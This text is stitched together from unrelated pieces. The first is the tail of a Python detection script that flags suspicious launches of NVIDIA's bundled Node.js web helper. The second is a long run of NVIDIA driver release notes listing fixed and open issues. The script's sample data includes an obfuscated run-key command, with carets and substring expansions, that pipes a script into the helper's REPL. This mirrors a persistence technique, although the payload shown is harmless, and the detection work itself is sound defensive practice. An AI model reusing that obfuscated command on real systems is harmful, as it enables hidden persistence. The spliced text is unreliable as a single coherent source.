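        return val[start:start + length] if length >= 0 else val[start:length]
    return VAR_RE.sub(sub, cmdline).replace("^", "")

WEB_HELPER_RE = re.compile(r"nvnode\\nvidia web helper\.exe", re.I)
SCRIPT_SWITCH_RE = re.compile(r"(?:^|\s)-[iep](?:\s|$)")  # node REPL / eval switches
SCRIPT_HOSTS = ("cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "hh.exe")  # assumed list

def flag_web_helper_launches(records):
    """Report (label, severity) for every launch of the web helper: high when a script
    switch is present or the parent is a script host, otherwise info (plain monitoring)."""
    alerts = []
    for rec in records:
        cmd = normalize_cmdline(rec.get("CommandLine", ""))
        if not WEB_HELPER_RE.search(cmd):
            continue
        parent = re.split(r"[\\/]", rec.get("ParentImage", ""))[-1].lower()
        suspicious = SCRIPT_SWITCH_RE.search(cmd) is not None or parent in SCRIPT_HOSTS
        alerts.append((rec["Label"], "high" if suspicious else "info"))
    return alerts

SAMPLE_RECORDS = [  # constructed; the run-key line mirrors the post's shape with a harmless script
    {"Label": "service-start", "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r'"C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe" --placeholder'},
    {"Label": "run-key", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'cm^d /c echo console.log(1) | "%ProgramFiles(x86)%\NVIDIA Corp%programdata:~0,-20%oration'
                    r'\NvNode\NVIDIA Web Helper.exe" -i'},
    {"Label": "unrelated", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Program Files\Other\other.exe" -i'},
]

def build_sample_tree(root, pad_size):
    """Write three constructed files: one to be flagged, two that must not be."""
    pad = b"\0" * pad_size
    samples = {"vendor-helper.exe": pad + b"..Node.js..", "big-plain.exe": pad * 2,
               "small-node.txt": b"Node.js"}
    for name, data in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(data)

def demo_scan(min_size=1024):
    """Scan a constructed tree with a small threshold (a real audit uses DEFAULT_MIN_SIZE)."""
    root = tempfile.mkdtemp(prefix="node-audit-")
    build_sample_tree(root, pad_size=min_size + 1)
    return find_node_binaries(root, min_size=min_size)
```

Run demo_scan() to see the scanner flag only the large, marked file, and flag_web_helper_launches(SAMPLE_RECORDS) to see the obfuscated run-key entry rated high once its carets and substring expansions are undone. On a real Windows host the environment map would be taken from the process's own environment and the records from Sysmon event ID 1 or autorun locations.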
Game Ready
Provides the optimal gaming experience for Warhammer 40,000: Dawn of War III, Heroes of the Storm 2.0, Batman: Arkham VR, Rick and Morty: Virtual Rick-ality, and Wilson's Heart.
Changes and Fixed Issues in Version 381.89
The following sections list the important changes and the most common issues resolved in this version. This list is only a subset of the total number of changes made in this driver version. The NVIDIA bug number is provided for reference.
[Sniper Elite 3]: The game crashes. [1880113]
[Notebook][eDP panel]: Blue-screen (code 3B) occurs followed by the Recovery screen during software unbundling process. [1900432]
[GeForce GTX 1060]: Blue-screen crash occurs pointing to driver (Nvlddmkm.sys) after the system reboots from sleep mode. [1814559]
GPU idling voltage has increased. [1904229]
Windows 10 Issues
[GeForce Experience]: Driver installation may fail when attempting to perform a driver overinstall. To workaround, perform a clean installation.
[SLI][GeForce GTX 1080][Battlefield 1 XP1]: With SLI enabled, corruption appears in the game when switching between full-screen and windowed mode. [1889162]
[GeForce GTX 1080 Ti][Mass Effect: Andromeda]: Random memory errors may occur when playing the game. [1887520]
[GeForce GTX 1080 Ti][Sid Meier's Civilization VI][G-Sync/SLI/DirectX 12]: Black corruption appears while entering the in-game menu after skipping the cutscene. [200283322]
[GeForce GTX Titan X][Ansel][Ghost Recon Wildlands]: With FXAA enabled from the NVIDIA Control Panel, the application crashes when enabling the in-game Ansel UI. [200283194]
Error code 43 appears in the Device Manager after installing the driver with HDMI display connected. [200283276]
[Pascal][Notebook]: The display remains blank while over installing the driver, requiring a reboot. [200273603]
[GM204, Tom Clancy's The Division Survival DLC] Game crashes, pointing to ntdll.dll when changed to full-screen and to windowed full-screen. [200252894]
[GM204, ShadowPlay] For Honor silently may crash if the intro video is skipped while instant replay is on. [200247313]
[SLI] [GeForce GTX 970M] Level loading may hang in Gears of War 4. [1826307]
[367.77, WDDM 2.1] Driver install/overinstall requires a reboot. [1757931]
[SLI, GP104] Installer prompts for a reboot during express overinstall of 372.69 driver on 372.54. [200231806]
[GM204] Quantum Break window either remains blank or freezes in game scene in windowed mode. [1804910]
Surround Display icon disappears after rotate mode is set to portrait. [200201040]
[SLI] Street Fighter V performance drop (pause and play) observed when the game is played at 4K resolution with SLI enabled. [200172046]
[347.09, GM204] Blank screen observed on an ASUS Tiled display when system resumes from shutdown or hibernation with Fast boot option enabled from BIOS. [1591053]
Windows 8.1/Windows 8 Issues
[3DVision] While a stereoscopic 3D video with stereoscopic 3D enabled is played, the monitor refresh rate switches to 60 Hz after changing the resolution using the Windows control panel. [1314811]
[Video, Notebook] The NVIDIA Control Panel video color settings have no effect on YouTube flash video playback within Internet Explorer 10. [999485]
Windows 7 Issues
[GeForce GTX 1080] Battlefield 1 hangs when campaign loaded with Fast Sync enabled from the NVIDIA Control Panel. [200254350]
[SLI] Street Fighter V performance drop (pause and play) observed when the game is played at 4K resolution with SLI enabled. [200172046]
[3DVision] While a stereoscopic 3D video with stereoscopic 3D enabled is played, the monitor refresh rate switches to 60 Hz after changing the resolution using the Windows control panel. [1314811]
Game Ready
Provides the optimal gaming experience for Prey, Battlezone, and the Gears of War 4 Multi-GPU Update.
Application SLI Profiles
Added or updated the following SLI profiles:
Sniper: Ghost Warrior 3
Warhammer 40,000: Dawn of War III
3D Vision Profiles
Added or updated the following 3DV profiles:
Warhammer 40,000: Dawn of War III - Not recommended
Changes and Fixed Issues in Version 382.05
The following sections list the important changes and the most common issues resolved in this version. This list is only a subset of the total number of changes made in this driver version. The NVIDIA bug number is provided for reference.
[SLI][No Man’s Sky - with The Foundation Update 1.10 patch]: With SLI enabled, there is texture corruption in the game. [200257478]
[SLI][GeForce GTX 670][World of Tanks]: In SLI mode, blue-screen crash occurs when pressing Alt+Tab during the game. [1895732]
[GeForce GTX 1080 Ti][Gears of War]: After the bootup movies, blue-screen crash occurs pointing to nvlddmkm.sys. [1914184]
The NVIDIA Control Panel in the Windows desktop context menu, as well as the NVIDIA system tray icon, may be absent. [200298863/1906498]
System may hang at a black screen upon cold boot up. [1913854]
In a multi-display configuration, the extended displays are unable to enter sleep mode. [1902053]
Windows 10 Issues
[DirectX 11 games]: On some titles, in-game V-Sync does not work if Fast Sync is selected from the NVIDIA Control Panel. Consequently, the game frame rate is not locked to the maximum refresh rate, resulting in possible tearing. [200304603]
[SteamVR titles]: SteamVR may crash when launched. [1917936] To workaround, uninstall GeForce Experience or reinstall the NVIDIA driver.
[Power DVD 17]: The display may go blank while playing HDR video in exclusive full-screen mode. [200300818]
[GeForce GTX 1070]: Games (Witcher 3, For Honor) do not recognize the custom refresh rates set using the NVIDIA Control Panel. [1916598]
[SLI][GeForce GTX 1080][Battlefield 1 XP1]: With SLI enabled, corruption appears in the game when switching between full-screen and windowed mode. [1889162]
[GeForce GTX 1080 Ti][Mass Effect: Andromeda]: Random memory errors may occur when playing the game. [1887520]
[GeForce GTX 1080 Ti][Sid Meier's Civilization VI][G-Sync/SLI/DirectX 12]: Black corruption appears while entering the in-game menu after skipping the cutscene. [200283322]
[GeForce GTX Titan X][Ansel][Ghost Recon Wildlands]: With FXAA enabled from the NVIDIA Control Panel, the application crashes when enabling the in-game Ansel UI. [200283194]
[Notebook][GeForce GTX 970M][Tom Clancy's The Division Survival DLC]: Game crashes, pointing to ntdll.dll when changed to full-screen and to windowed full-screen. [200252894]
[Notebook][GeForce GTX 970M][ShadowPlay][For Honor]: The game silently may crash if the intro video is skipped while instant replay is on. [200247313]
[SLI][Notebook][GeForce GTX 970M][Gears of War 4]: Level loading may hang. [1826307]
NVIDIA Control Panel custom color settings are reset to the default after switching a game between windowed and full-screen mode. [1917071]
NVIDIA Control Panel custom color profiles and ICC profiles are lost when using the Microsoft Game Bar. [1904238]
Display monitor is unable to enter sleep mode. [19116554]
[GeForce Experience]: Driver installation may fail when attempting to perform a driver overinstall. To workaround, perform a clean installation.
[Notebook][Pascal GPU]: The display remains blank while over installing the driver, requiring a reboot. [200273603]
Error code 43 appears in the Device Manager after installing the driver with HDMI display connected. [200283276]
Driver install/overinstall requires a reboot. [1757931]
Windows 7 Issues
[GeForce GTX 1080] Battlefield 1 hangs when campaign loaded with Fast Sync enabled from the NVIDIA Control Panel. [200254350]
[GeForce GTX 1060]: Blue-screen crash occurs pointing to driver (Nvlddmkm.sys) after the system reboots from sleep mode. [1814559]
Changes and fixed issues:
[TITAN X][3D Vision][Windows 10 Creator’s Update]: The Windows Store does not open when 3D Vision is enabled. [1906805]
[GeForce GTX 1080Ti][Prey 2]: Stuttering occurs during gameplay. [1902201]
[GeForce GTX 1070][Windows 10 Creator’s Update]: In multi-display mode, extended monitors cannot be put into sleep mode. [1916554]
[GeForce GTX 1060]: Blue-screen crash occurs pointing to driver (Nvlddmkm.sys) after the system reboots from sleep mode. [1814559]
[GeForce GTX 970][SLI]: SLI cannot be enabled unless Norton 360 is disabled or Windows is booted in Safe Mode. [1919094]
Open issues:
Windows 10
[DirectX 11 games]: On some titles, in-game V-Sync does not work if Fast Sync is selected from the NVIDIA Control Panel. Consequently, the game frame rate is not locked to the maximum refresh rate, resulting in possible tearing. [200304603]
[SteamVR titles]: SteamVR may crash when launched. [1917936] To workaround, uninstall GeForce Experience or reinstall the NVIDIA driver.
[Power DVD 17]: The display may go blank while playing HDR video in exclusive full-screen mode. [200300818]
[GeForce GTX 1070]: Games (Witcher 3, For Honor) do not recognize the custom refresh rates set using the NVIDIA Control Panel. [1916598]
[SLI][GeForce GTX 1080][Battlefield 1 XP1]: With SLI enabled, corruption appears in the game when switching between full-screen and windowed mode. [1889162]
[GeForce GTX 1080 Ti][Mass Effect: Andromeda]: Random memory errors may occur when playing the game. [1887520]
[GeForce GTX 1080 Ti][Sid Meier's Civilization VI][G-Sync/SLI/DirectX 12]: Black corruption appears while entering the in-game menu after skipping the cutscene. [200283322]
[Notebook][GeForce GTX 970M][Tom Clancy's The Division Survival DLC]: Game crashes, pointing to ntdll.dll when changed to full-screen and to windowed full-screen. [200252894]
[Notebook][GeForce GTX 970M][ShadowPlay][For Honor]: The game silently may crash if the intro video is skipped while instant replay is on. [200247313]
[SLI][Notebook][GeForce GTX 970M][Gears of War 4]: Level loading may hang. [1826307]
NVIDIA Control Panel custom color settings are reset to the default after switching a game between windowed and full-screen mode. [1917071]
NVIDIA Control Panel custom color profiles and ICC profiles are lost when using the Microsoft Game Bar. [1904238]
[GeForce Experience]: Driver installation may fail when attempting to perform a driver overinstall. To workaround, perform a clean installation.
[Notebook][Pascal GPU]: The display remains blank while over installing the driver, requiring a reboot. [200273603]
Error code 43 appears in the Device Manager after installing the driver with HDMI display connected. [200283276]
Driver install/overinstall requires a reboot. [1757931]
Windows 7
[GeForce GTX 1080] Battlefield 1 hangs when campaign loaded with Fast Sync enabled from the NVIDIA Control Panel. [200254350]
SLI
Bulletstorm: Full Clip Edition
Little Nightmares
PlayerUnknown’s Battlegrounds
Transformers Online
Fixed issues
[DirectX 11 games]: On some titles, in-game V-Sync does not work if Fast Sync is selected from the NVIDIA Control Panel. Consequently, the game frame rate is not locked to the maximum refresh rate, resulting in possible tearing. [200304603]
[Aerofly RC 7]: Corruption occurs in the game when shadows are enabled. [1921628]
[SLI][GeForce GTX]: The secondary display remains blank after switching from Clone or Extended mode to secondary-only display mode. [200288996]
Open issues Win10
[Firefox.exe]: Browser errors may occur or the browser may crash with NVIDIA drivers. [200301372]
[Kepler GPUs][SteamVR]: The compositor fails when starting up. [1929201]
[Power DVD 17]: The display may go blank while playing HDR video in exclusive full-screen mode. [200300818]
[GeForce GTX 1070]: Games (Witcher 3, For Honor) do not recognize the custom refresh rates set using the NVIDIA Control Panel. [1916598]
[SLI][GeForce GTX 1080][Battlefield 1 XP1]: With SLI enabled, corruption appears in the game when switching between full-screen and windowed mode. [1889162]
[GeForce GTX 1080 Ti][Mass Effect: Andromeda]: Random memory errors may occur when playing the game. [1887520]
[GeForce GTX 1080 Ti][Sid Meier's Civilization VI][G-Sync/SLI/DirectX 12]: Black corruption appears while entering the in-game menu after skipping the cutscene. [200283322]
[Notebook][GeForce GTX 970M][Tom Clancy's The Division Survival DLC]: Game crashes, pointing to ntdll.dll when changed to full-screen and to windowed full-screen. [200252894]
[Notebook][GeForce GTX 970M][ShadowPlay][For Honor]: The game silently may crash if the intro video is skipped while instant replay is on. [200247313]
[SLI][Notebook][GeForce GTX 970M][Gears of War 4]: Level loading may hang. [1826307]
[GeForce Experience]: Driver installation may fail when attempting to perform a driver overinstall. To workaround, perform a clean installation.
[Notebook][Pascal GPU]: The display remains blank while over installing the driver, requiring a reboot. [200273603]
Error code 43 appears in the Device Manager after installing the driver with HDMI display connected. [200283276]
Driver install/overinstall requires a reboot. [1757931]
Win7
[GeForce GTX 1080] Battlefield 1 hangs when campaign loaded with Fast Sync enabled from the NVIDIA Control Panel. [200254350]
New extensions:
VK_KHR_get_surface_capabilities2
VK_EXT_sampler_filter_minmax
VK_NV_fill_rectangle
VK_NV_fragment_coverage_to_color
Updated VulkanRT loader to 1.0.49.0
Various performance improvements